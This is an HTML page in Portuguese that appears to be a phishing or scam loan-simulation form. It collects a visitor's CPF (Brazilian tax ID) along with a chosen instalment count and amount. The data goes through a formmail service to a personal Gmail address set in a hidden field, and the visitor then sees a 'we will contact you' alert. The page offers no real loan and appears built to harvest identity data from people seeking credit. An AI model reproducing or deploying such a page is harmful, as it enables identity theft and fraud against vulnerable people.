<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//pt-BR">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
</head>
<body>
<form action="https://formmail.kinghost.net/formmail.cgi" method="POST">
<img src="emprestimo.jpg" class="foto">
<p>faca uma simulação<br> e contrate ja!</p>


<div class=" geral">
<div class="recarga">EMPRSTIMO:<br>saldo: 0.00
</div><br><br>
<t>CPF<br><br>
<input class="box" type="tel" size="2" name="" value=""maxlength="11"required>
</div>

<br>
<select class="recar"name="select" required> 
<option value="">PARCELAS</option> 
<option value="6x">6x</option> 
<option value="12x">12x</option> 
<option value="24x">24x</option> 
<option value="36x">36x</option> 
<option value="48x">48x</option> 
</select>
 <select class="rvalor"name="select"> 
<option value="valor">VALOR</option> 
<option value="1,000.00">1,000.00</option> 
<option value="2,500.00">2,500.00</option> 
<option value="3,000.00">3,000.00</option> 
<option value="3,500.00">3,500.00</option> 
<option value="4,000.00">4,000.00</option> 
<option value="4,500.00">4,500.00</option> 
<option value="5,000.00">5,000.00</option> 
<option value="10,000.00">10,000.00</option> 
</select><br><br>








&nbsp;<input type="hidden" name="recipient" value="multijogo1980@gmail.com"> &nbsp;
&nbsp;
&nbsp;
&nbsp;
&nbsp;
&nbsp;
&nbsp;<input type="hidden" name="subject" value="Assunto"  <input="">


<input maxlength="5" class="form-control input-lg" id="disabledInput" name="total" type="hidden" placeholder="R$" readonly=" disabled">


<input maxlength="5" id="n1" type="hidden" name="hiddentotal" value="">
<span class="input-group-addon"></span>
<br>
<br>
<input class="valor" maxlength="2" type="hidden" size="8" name="valor" value="" placeholder="R$" autocomplete="off" onchange="this.form.total.value=checkChoice(this);">
 <label class="btn btn-default">


&nbsp;<input class="btn" type="submit" name="" value="SIMULAR" select="button alt" onclick="funcao1()">

&nbsp; 
&nbsp; 



<style>
    
body {
    font-size:12px;
    color:white;
    margin-left:px;
    background:purple;
    height:100%;
    justify content:center;
}
.geral {
    position:relative;
}
.recarga {
    position:absolute;
    margin-left:%;
    
}
.box {position:relative;
    width:40%;
    height:30px;
    border:2px solid red;
    margin-left:100px;
    border-radius:%;
    text-align:center;
    
}
.recar{
    position:relative;
     width:40%;
    height:50px;
    margin-left:30px;
    bottom:0;  
    text-align:center; 
    justify content :center;
}
.btn {
    position:relative;
    width:90%;
    height:50px;
    margin-left:10px;
    bottom:-10;
}
.foto {
    width:100%; 
    height:140px;
}
h {
    margin-left:5px;
}
.rvalor {
    position:relative;
     width:40%;
    height:50px;
    margin-left:10px;
    text-align:center;
    bottom:0;
}

p{
    background:orange;
    text-align:center;
    }
    t {
        margin-left:150px;
    }
</style>
<script>
function funcao1(){
    alert ("Analise em Andamento Brever Entraremos em Contato.");
}
</script>